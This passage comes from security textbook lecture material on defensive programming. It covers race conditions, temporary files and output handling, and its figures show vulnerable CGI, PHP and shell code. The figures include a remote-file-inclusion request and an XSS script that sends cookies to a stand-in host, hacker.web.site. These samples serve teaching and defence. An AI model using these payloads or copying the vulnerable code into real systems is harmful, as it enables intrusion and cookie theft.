access the shared resource at the same time. The data in the shared file will then

likely be corrupted. This is a classic illustration of a race condition. The problem

is that the process of checking the lockfile does not exist, and then creating the

lockfile must be executed together, without the possibility of interruption. This is

known as an atomic operation. The correct implementation in this case is not to

test separately for the presence of the lockfile, but always to attempt to create it.

The specific options used in the file create state that if the file already exists, then

the attempt must fail and return a suitable error code. If it fails, the process waits

for a period and then tries again until it succeeds. The operating system implements

this function as an atomic operation, providing guaranteed controlled access to the

resource. While the use of a lockfile is a classic technique, it has the advantage that

the presence of a lock is quite clear because the lockfile is seen in a directory listing.

It also allows the administrator to easily remove a lock left by a program that either

crashed or otherwise failed to remove the lock.

There are more modern and alternative locking mechanisms available for files.

These may also be advisory and can also be mandatory, where the operating system

guarantees that a locked file cannot be accessed inappropriately. The issue with

mandatory locks is the mechanisms for removing them should the locking process

crash or otherwise not release the lock. These mechanisms are also implemented

differently on different operating systems. Hence care is needed to ensure that the

chosen mechanism is used correctly.

Figure 11.8 illustrates the use of the advisory flock call in a perl script. This

might typically be used in a Web CGI form handler to append information provided

by a user to this file. Subsequently another program, also using this locking mechanism,

could access the file and process and remove these details. Note that there

are subtle complexities related to locking files using different types of read or write

access. Suitable program or function references should be consulted on the correct

use of these features.

39

Safe Temporary Files

Many programs use temporary files

Often in common, shared system area

Must be unique, not accessed by others

Commonly create name using process ID

Unique, but predictable

Attacker might guess and attempt to create own file between program checking and creating

Secure temporary file creation and use requires the use of random names

40

Many programs need to store a temporary copy of data while they are processing the

data. A temporary file is commonly used for this purpose. Most operating systems

provide well-known locations for placing temporary files and standard functions for

naming and creating them. The critical issue with temporary files is that they are

unique and not accessed by other processes. In a sense this is the opposite problem

to managing access to a shared file. The most common technique for constructing

a temporary filename is to include a value such as the process identifier. As each

process has its own distinct identifier, this should guarantee a unique name. The

program generally checks to ensure that the file does not already exist, perhaps left

over from a crash of a previous program, and then creates the file. This approach

suffices from the perspective of reliability but not with respect to security.

Again the problem is that an attacker does not play by the rules. The attacker

could attempt to guess the temporary filename a privileged program will use.

The attacker then attempts to create a file with that name in the interval between

the program checking the file does not exist and subsequently creating it. This is

another example of a race condition, very similar to that when two processes race to

access a shared file when locks are not used. There is a famous example, reported

in [WHEE03], of some versions of the tripwire file integrity program suffering

from this bug. The attacker would write a script that made repeated guesses on the

temporary filename used and create a symbolic link from that name to the password

file. Access to the password file was restricted, so the attacker could not write to it.

However, the tripwire program runs with root privileges, giving it access to all files

on the system. If the attacker succeeds, then tripwire will follow the link and use

the password file as its temporary file, destroying all user login details and denying

access to the system until the administrators can replace the password file with a

backup copy. This was a very effective and inconvenient denial of service attack on

the targeted system. This illustrates the importance of securely managing temporary

file creation.

Secure temporary file creation and use preferably requires the use of a random

temporary filename. The creation of this file should be done using an atomic system

primitive, as is done with the creation of a lockfile. This prevents the race condition

and hence the potential exploit of this file. The standard C function mkstemp() is

suitable; however, the older functions tmpfile(), tmpnam(), and tempnam() are all

insecure unless used with care. It is also important that the minimum access is given

to this file. In most cases only the effective owner of the program creating this file

should have any access.

The GNOME Programming Guidelines recommend using

the C code shown in Figure 11.9 to create a temporary file in a shared directory on

Linux and UNIX systems. Although this code calls the insecure tempnam() function,

it uses a loop with appropriately restrictive file creation flags to counter its security

deficiencies. Once the program has finished using the file, it must be closed and

unlinked. Perl programmers can use the File::Temp module for secure temporary file

creation. Programmers using other languages should consult appropriate references

for suitable methods.

When the file is created in a shared temporary directory, the access permissions

should specify that only the owner of the temporary file, or the system administrators,

should be able to remove it. This is not always the default permission setting,

which must be corrected to enable secure use of such files. On Linux and UNIX

systems this requires setting the sticky permission bit on the temporary directory, as

we discuss in Sections 4.4 and 25.3 .

41

Other Program Interaction

42

As well as using functionality provided by the operating system and standard

library functions, programs may also use functionality and services provided

by other programs. Unless care is taken with this interaction, failure to identify

assumptions about the size and interpretation of data flowing among different

programs can result in security vulnerabilities. We discuss a number of issues

related to managing program input in Section 11.2 and program output in Section 11.5 .

The flow of information between programs can be viewed as output from one

forming input to the other. Such issues are of particular concern when the program

being used was not originally written with this wider use as a design issue

and hence did not adequately identify all the security concerns that might arise.

This occurs particularly with the current trend of providing Web interfaces to

programs that users previously ran directly on the server system. While ideally all

programs should be designed to manage security concerns and be written defensively,

this is not the case in reality. Hence the burden falls on the newer programs,

utilizing these older programs, to identify and manage any security issues

that may arise.

A further concern relates to protecting the confidentiality and integrity of

the data flowing among various programs. When these programs are running on

the same computer system, appropriate use of system functionality such as pipes

or temporary files provides this protection. If the programs run on different systems,

linked by a suitable network connection, then appropriate security mechanisms

should be employed by these network connections. Alternatives include the

use of IP Security (IPSec), Transport Layer/Secure Socket Layer Security (TLS/

SSL), or Secure Shell (SSH) connections. Even when using well regarded, standardized protocols, care is

needed to ensure they use strong cryptography, as weaknesses have been found in a

number of algorithms and their implementations [SIMP11]. We discuss some of these alternatives in

Chapter 22 .

Suitable detection and handling of exceptions and errors generated by program

interaction is also important from a security perspective. When one process invokes

another program as a child process, it should ensure that the program terminates

correctly and accept its exit status. It must also catch and process signals resulting

from interaction with other programs and the operating system.

Programs may use functionality and services of other programs

Security vulnerabilities can result unless care is taken with this interaction

Such issues are of particular concern when the program being used did not adequately identify all the security concerns that might arise

Occurs with the current trend of providing Web interfaces to programs

Burden falls on the newer programs to identify and manage any security issues that may arise

Issue of data confidentiality/integrity

Detection and handling of exceptions and errors generated by interaction is also important from a security perspective

Handling Program Output

Final component is program output

May be stored for future use, sent over net, displayed

May be binary or text

Important from a program security perspective that the output conform to the expected form and interpretation

Programs must identify what is permissible output content and filter any possibly untrusted data to ensure that only valid output is displayed

Character set should be specified

43

The final component of our model of computer programs is the generation of output

as a result of the processing of input and other interactions. This output might be

stored for future use (e.g., in files or a database), or be transmitted over

a network connection, or be destined for display to some user. As with program

input, the output data may be classified as binary or textual. Binary data may encode

complex structures, such as requests to an X-Windows display system to create and

manipulate complex graphical interface display components. Or the data could be

complex binary network protocol structures. If representing textual information,

the data will be encoded using some character set and possibly representing some

structured output, such as HTML.

In all cases it is important from a program security perspective that the output

really does conform to the expected form and interpretation. If directed to a user,

it will be interpreted and displayed by some appropriate program or device. If this

output includes unexpected content, then anomalous behavior may result, with

detrimental effects on the user. A critical issue here is the assumption of common

origin. If a user is interacting with a program, the assumption is that all output seen

was created by, or at least validated by, that program. However, as the discussion

of cross-site scripting (XSS) attacks in Section 11.2 illustrates, this assumption may

not be valid. A program may accept input from one user, save it, and subsequently

display it to another user. If this input contains content that alters the behavior of

the program or device displaying the data, and the content is not adequately sanitized

by the program, then an attack on the user is possible.

Consider two examples. The first involves simple text-based programs run

on classic time-sharing systems when purely textual terminals, such as the VT100,

were used to interact with the system. Such terminals often supported a set of

function keys, which could be programmed to send any desired sequence of characters

when pressed. This programming was implemented by sending a special escape

sequence. The terminal would recognize these sequences and, rather than displaying

the characters on the screen, would perform the requested action. In addition

to programming the function keys, other escape sequences were used to control

formatting of the textual output (bold, underline, etc.), to change the current cursor

location, and critically to specify that the current contents of a function key should

be sent, as if the user had just pressed the key. Together these capabilities could be

used to implement a classic command injection attack on a user, which was a favorite

student prank in previous years. The attacker would get the victim to display some

carefully crafted text on his or her terminal. This could be achieved by convincing

the victim to run a program, have it included in an e-mail message, or have it written

directly to the victim’s terminal if the victim permitted this. While displaying some

innocent message to distract the targeted user, this text would also include a number

of escape sequences that first programmed a function key to send some selected

command and then the command to send that text as if the programmed function

key had been pressed. If the text was displayed by a program that subsequently

exited, then the text sent from the programmed function key would be treated as

if the targeted user had typed it as his or her next command. Hence the attacker

could make the system perform any desired operation the user was permitted to

do. This could include deleting the user’s files or changing the user’s password. With

this simple form of attack, the user would see the commands and the response being

displayed and know it had occurred, though too late to prevent it. With more subtle

combinations of escape sequences, it was possible to capture and prevent this text

from being displayed, hiding the fact of the attack from direct observation by the

user until its consequences became obvious. A more modern variant of this attack

exploits the capabilities of an insufficiently protected X-terminal display to similarly

hijack and control one or more of the user’s sessions.

The key lesson illustrated by this example concerns the user’s expectations

of the type of output that would be sent to the user’s terminal display. The user

expected the output to be primarily pure text for display. If a program such as a

text editor or mail client used formatted text or the programmable function keys,

then it was trusted not to abuse these capabilities. And indeed, most such programs

encountered by users did indeed respect these conventions. Programs like a mail

client, which displayed data originating from other users, needed to filter such text

to ensure that any escape sequences included in them were disabled. The issue for

users then was to identify other programs that could not be so trusted, and if necessary

filter their output to foil any such attack. Another lesson seen here, and even

more so in the subsequent X-terminal variant of this attack, was to ensure that

untrusted sources were not permitted to direct output to a user’s display. In the case

of traditional terminals, this meant disabling the ability of other users to write messages

directly to the user’s display. In the case of X-terminals, it meant configuring

the authentication mechanisms so that only programs run at the user’s command

were permitted to access the user’s display.

The second example is the classic cross-site scripting (XSS) attack using a

guestbook on some Web server. If the guestbook application fails adequately to

check and sanitize any input supplied by one user, then this can be used to implement

an attack on users subsequently viewing these comments. This attack exploits

the assumptions and security models used by Web browsers when viewing content

from a site. Browsers assume all of the content was generated by that site and is

equally trusted. This allows programmable content like JavaScript to access and

manipulate data and metadata at the browser site, such as cookies associated with

that site. The issue here is that not all data were generated by, or under the control

of, that site. Rather the data came from some other, untrusted user.

Any programs that gather and rely on third-party data have to be responsible

for ensuring that any subsequent use of such data is safe and does not violate

the user’s assumptions. These programs must identify what is permissible output

content and filter any possibly untrusted data to ensure that only valid output is

displayed. The simplest filtering alternative is to remove all HTML markup. This

will certainly make the output safe but can conflict with the desire to allow some

formatting of the output. The alternative is to allow just some safe markup through.

As with input filtering, the focus should be on allowing only what is safe rather than

trying to remove what is dangerous, as the interpretation of dangerous may well

change over time.

Another issue here is that different character sets allow different encodings of

meta characters, which may change the interpretation of what is valid output. If the

display program or device is unaware of the specific encoding used, it might make

a different assumption to the program, possibly subverting the filtering. Hence it is

important for the program either to explicitly specify encoding where possible or

otherwise ensure that the encoding conforms to the display expectations. This is the

obverse of the issue of input canonicalization, where the program ensures that it

had a common minimal representation of the input to validate. In the case of Web

output, it is possible for a Web server to specify explicitly the character set used in

the Content-Type HTTP response header. Unfortunately, this is not specified as

often as it should be. If not specified, browsers will make an assumption about the

default character set to use. This assumption is not clearly codified; hence different

browsers can and do make different choices. If Web output is being filtered, the

character set should be specified.

Note that in these examples of security flaws that result from program output,

the target of compromise was not the program generating the output but

rather the program or device used to display the output. It could be argued that

this is not the concern of the programmer, as their program is not subverted.

However, if the program acts as a conduit for attack, the programmer’s reputation

will be tarnished, and users may well be less willing to use the program. In the case

of XSS attacks, a number of well-known sites were implicated in these attacks and

suffered adverse publicity.

Summary

Handling program input

Input size and buffer overflow

Interpretation of program input

Validating input syntax

Input fuzzing

Interacting with the operating system and other programs

Environment variables

Using appropriate, least privileges

Systems calls and standard library functions

Preventing race conditions with shared system resources

Safe temporary file use

Interacting with other programs

Software security issues

Introducing software security and defensive programming

Writing safe program code

Correct algorithm implementation

Ensuring that machine language corresponds to algorithm

Correct interpretation of data values

Correct use of memory

Preventing race conditions with shared memory

Handling program output

44

Chapter 11 summary.

Software Error Category: Insecure Interaction Between Components

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Unrestricted Upload of File with Dangerous Type

Cross-Site Request Forgery (CSRF)

URL Redirection to Untrusted Site ('Open Redirect')

Software Error Category: Risky Resource Management

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Download of Code Without Integrity Check

Inclusion of Functionality from Untrusted Control Sphere

Use of Potentially Dangerous Function

Incorrect Calculation of Buffer Size

Uncontrolled Format String

Integer Overflow or Wraparound

Software Error Category: Porous Defenses

Missing Authentication for Critical Function

Missing Authorization

Use of Hard-coded Credentials

Missing Encryption of Sensitive Data

Reliance on Untrusted Inputs in a Security Decision

Execution with Unnecessary Privileges

Incorrect Authorization

Incorrect Permission Assignment for Critical Resource

Use of a Broken or Risky Cryptographic Algorithm

Improper Restriction of Excessive Authentication Attempts

Use of a One-Way Hash without a Salt

Operating System

executing algorithm, processing input data,

generating output

Other Programs

Computer System

Network Link

File System

Machine Hardware

Keyboard & Mouse

GUI Display

Program

Database

DBMS

Figure 11.1 Abstract View of Program

Operating System

executing algorithm,

processing input data,

generating output

Other

Programs

Computer System

Network Link

File System

Machine Hardware

Keyboard

& Mouse

GUI Display

Program

Database

DBMS

Figure 11.1 Abstract View of Program

1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalsToBrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('Finger User'), 11 $q->h1('Finger User'); 12 print "<pre>"; 13 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 print `/usr/bin/finger -sh $user`; 17 18 # display HTML footer 19 print "</pre>"; 20 print $q->end_html;

(a) Unsafe Perl finger CGI script

<html><head><title>Finger User</title></head><body> <h1>Finger User</h1> <form method=post action="finger.cgi"> <b>Username to finger</b>: <input type=text name=user value=""> <p><input type=submit value="Finger User"> </form></body></html>

(b) Finger form

Finger User Login Name TTY Idle Login Time Where lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine Finger User attack success -rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi -rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html

(c) Expected and subverted finger CGI responses

14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 die "The specified user contains illegal characters!" 17 unless ($user =~ /^\w+$/); 18 print `/usr/bin/finger -sh $user`;

(d) Safety extension to Perl finger CGI script

Figure 11.2 A Web CGI Injection Attack

1 #!/usr/bin/perl

2 # finger.cgi - finger CGI script using Perl5 CGI module

3

4 use CGI;

5 use CGI::Carp qw(fatalsToBrowser);

6 $q = new CGI; # create query object

7

8 # display HTML header

9 print $q->header,

10 $q->start_html('Finger User'),

11 $q->h1('Finger User');

12 print "<pre>";

13

14 # get name of user and display their finger details

15 $user = $q ->param("user");

16 print `/usr/bin/finger -sh $user`;

17

18 # display HTML footer

19 print "</pre>";

20 print $q->end_html;

(a) Unsafe Perl finger CGI script

<html><head><title>Finger User</title></head><body>

<h1>Finger User</h1>

<form method=post action="finger.cgi">

<b>Username to finger</b>: <input type=text name=user value="">

<p><input type=submi t value="Finger User">

</form></body></html>

(b) Finger form

Finger User

Login Name TTY Idle Login Time Where

lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine

Finger User

attack success

-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi

-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html

(c) Expected and subverted finger CGI responses

14 # get name of user and display their finger details

15 $user = $q ->param("user");

16 die "The specified user cont ains illegal characters!"

17 unless ($user =~ /^ \w+$/);

18 print `/usr/bin/finger -sh $user`;

(d) Safety extension to Perl finger CGI script

Figure 11.2 A Web CGI Injection Attack

$name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . $name . "';" $result = mysql_query($query);

(a) Vulnerable PHP code

$name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . mysql_real_escape_string($name) . "';" $result = mysql_query($query);

(b) Safer PHP code

Figure 11.3 SQL Injection Example

$name = $_REQUEST['name'];

$query = “SELECT * FROM suppliers WH ERE name = '" . $name . "';"

$result = mysql_query($query);

(a) Vulnerable PHP code

$name = $_REQUEST['name'];

$query = “SELECT * FROM suppliers WHERE name = '" .

mysql_real_escape_string($name) . "';"

$result = mysql_query($query);

(b) Safer PHP code

Figure 11.3 SQL Injection Example

<?php include $path . 'functions.php'; include $path . 'data/prefs.php'; …

(a) Vulnerable PHP code

GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

(b) HTTP exploit request

Figure 11.4 PHP Code Injection Example

<?php

include $path . 'functions.php';

include $path . 'data/prefs.php';

(a) Vulnerable PHP code

GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

(b) HTTP exploit request

Figure 11.4 PHP Code Injection Example

Thanks for this information, its great! <script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>

(a) Plain XSS example

Thanks for this information, its great! &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62; &#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116; &#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111; &#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58; &#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114; &#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116; &#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101; &#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100; &#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46; &#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47; &#115;&#99;&#114;&#105;&#112;&#116;&#62;

(b) Encoded XSS example

Figure 11.5 XSS Example

Thanks for this information, its great!

<script>document.location='http://hacker.web.site/cookie.cgi?'+

document.cookie</script>

(a) Plain XSS example

Thanks for this information, its great!

&#60;&#115;&#99;&#114;&#105;& #112;&#116;&#62;

&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;

&#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;

&#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58;

&#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114;

&#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116;

&#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101;

&#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100;

&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;

&#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47;

&#115;&#99;&#114;&#105;&#112;&#116;&#62;

(b) Encoded XSS example

Figure 11.5 XSS Example

#!/bin/bash user=`echo $1 | sed 's/@.*$//'` grep $user /var/local/accounts/ipaddrs

(a) Example vulnerable privileged shell script

#!/bin/bash PATH=”/sbin:/bin:/usr/sbin:/usr/bin” export PATH user=`echo $1 | sed 's/@.*$//'` grep $user /var/local/accounts/ipaddrs

(b) Still vulnerable privileged shell script

Figure 11.6 Vulnerable Shell Scripts

#!/bin/bash

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(a) Example vulnerable privileged shell script

#!/bin/bash

PATH=”/sbin:/bin:/usr/sbin:/usr/bin”

export PATH

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(b) Still vulnerable privileged shell script

Figure 11.6 Vulnerable Shell Scripts

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for writing for each pattern seek to start of file overwrite file contents with pattern close file remove file

(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for update for each pattern seek to start of file overwrite file contents with pattern flush application write buffers sync file system write buffers with device close file remove file

(b) Better secure file shredding program algorithm

Figure 11.7 Example Global Data Overflow Attack

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]

open file for writing

for each pattern

seek to start of file

overwrite file contents with pattern

close file

remove file

(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]

open file for update

for each pattern

seek to start of file

overwrite file contents with pattern

flush application write buffers

sync file system write buffers with device

close file

remove file

(b) Better secure file shredding program algorithm

Figure 11.7 Examp le Global Data Overflow Attack

#!/usr/bin/perl # $EXCL_LOCK = 2; $UNLOCK = 8; $FILENAME = “forminfo.dat”; # open data file and acquire exclusive access lock open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n"; flock FILE, $EXCL_LOCK; … use exclusive access to the forminfo file to save details # unlock and close file flock FILE, $UNLOCK; close(FILE);

Figure 11.8 Perl File Locking Example

#!/usr/bin/perl

#

$EXCL_LOCK = 2;

$UNLOCK = 8;

$FILENAME = “forminfo.dat”;

# open data file and acquire exclusive access lock

open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n";

flock FILE, $EXCL_LOCK;

… use exclusive access to the form info file to save details

# unlock and close file

flock FILE, $UNLOCK;

close(FILE);

Figure 11.8 Perl File Locking Example

char *filename; int fd; do { filename = tempnam (NULL, "foo"); fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600); free (filename); } while (fd == −1);

Figure 11.9 C Temporary File Creation Example